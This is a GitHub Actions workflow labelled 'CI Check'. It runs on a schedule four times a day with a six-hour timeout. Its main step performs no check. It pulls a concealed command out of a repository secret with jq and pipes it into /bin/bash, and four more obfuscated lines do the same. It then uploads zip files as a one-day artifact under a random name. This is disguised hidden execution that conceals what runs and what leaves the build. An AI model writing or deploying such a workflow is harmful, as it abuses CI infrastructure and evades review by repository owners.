name: CI Check
on:
  workflow_dispatch:

  schedule:
    - cron: '9 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          hx82774: ${{ secrets.hx82774 }}
        run: |
          printf '%s' "$hx82774" | jq -r .febh836 | /bin/bash
          printf '%s' "$xv67" | jq -r .tt797 | /bin/bash
          echo $z1 | jq -r .w92846 | /bin/bash
          echo $pzlcg851 | jq -r .fisf21 | /bin/bash
          printf '%s' "$k0" | jq -r .sniin468 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: X0HIFNOn
          path: "*.zip"
          retention-days: 1
